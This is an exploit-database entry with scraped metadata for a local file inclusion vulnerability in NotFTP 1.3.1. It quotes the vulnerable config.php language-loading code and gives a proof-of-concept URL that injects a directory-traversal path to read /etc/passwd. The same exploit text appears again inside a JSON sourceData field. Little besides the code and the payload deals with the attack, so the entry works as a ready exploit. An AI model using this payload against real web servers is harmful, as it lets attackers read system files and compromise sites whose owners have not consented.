NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability
2009-04-21T00:00:00
ID 1337DAY-ID-5083 Type zdt Reporter Kacper Modified 2009-04-21T00:00:00
Description
Exploit for unknown platform in category web applications
=========================================================
NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability
=========================================================
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/
Author: Kacper
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be silly. So don't.
PoC:
http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
The End
=========
# 0day.today [2018-03-01] #
{"published": "2009-04-21T00:00:00", "id": "1337DAY-ID-5083", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 5.1, "vector": "NONE", "modified": "2018-03-01T03:36:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-5083"]}, {"type": "zdt", "idList": ["1337DAY-ID-30538", "1337DAY-ID-28901", "1337DAY-ID-22493"]}, {"type": "exploitdb", "idList": ["EDB-ID:43071", "EDB-ID:44842", "EDB-ID:34238"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144844", "PACKETSTORM:148053", "PACKETSTORM:127720"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:44D46F31F7E58250E816354AA89B8307", "EXPLOITPACK:C7B5D1AF7C2C90DC97EDE10892A220CC", "EXPLOITPACK:BDF35D6FDD665ABEF558F76B6F2E65DF"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310809329", "OPENVAS:1361412562310107080", "OPENVAS:1361412562310808797", "OPENVAS:1361412562310107079", "OPENVAS:1361412562310807090", "OPENVAS:1361412562310807506"]}, {"type": "seebug", "idList": ["SSV:87176"]}], "modified": "2018-03-01T03:36:07", "rev": 2}, "vulnersScore": 5.1}, "type": "zdt", "lastseen": "2018-03-01T03:36:07", "edition": 2, "title": "NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability", "href": "https://0day.today/exploit/description/5083", "modified": "2009-04-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "https://0day.today/exploit/5083", "references": [], "reporter": "Kacper", "sourceData": "=========================================================\r\nNotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability\r\n=========================================================\r\n\r\n\r\nNotFTP 1.3.1 => Local file include\r\nhttp://sourceforge.net/projects/notftp/\r\n\r\n\r\nAuthor: Kacper\r\n\r\nDC++ Hub address: bluber-hub.no-ip.biz:2008\r\n\r\nVuln:\r\n\r\nFile config.php:\r\n\r\n#########################################################################\r\n# This is where we decide what language to use. Don't mess with this\r\n# either.\r\n#########################################################################\r\n\r\nif (isset($newlang))\r\n{\r\n require_once(\"lib/lang/\".$languages[$newlang][\"file\"]);\r\n}\r\nelseif (isset($_COOKIE[\"notftplang\"]))\r\n{\r\n require_once(\"lib/lang/\".$languages[$_COOKIE[\"notftplang\"]][\"file\"]);\r\n}\r\nelse\r\n{\r\n require_once(\"lib/lang/\".$languages[DEFAULTLANG][\"file\"]);\r\n}\r\n\r\n# NotFTP version. Changing this would be silly. So don't.\r\n\r\nPoC:\r\n\r\nhttp://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd\r\n\r\nThe End\r\n\r\n========= \r\n\r\n\r\n\n# 0day.today [2018-03-01] #"}
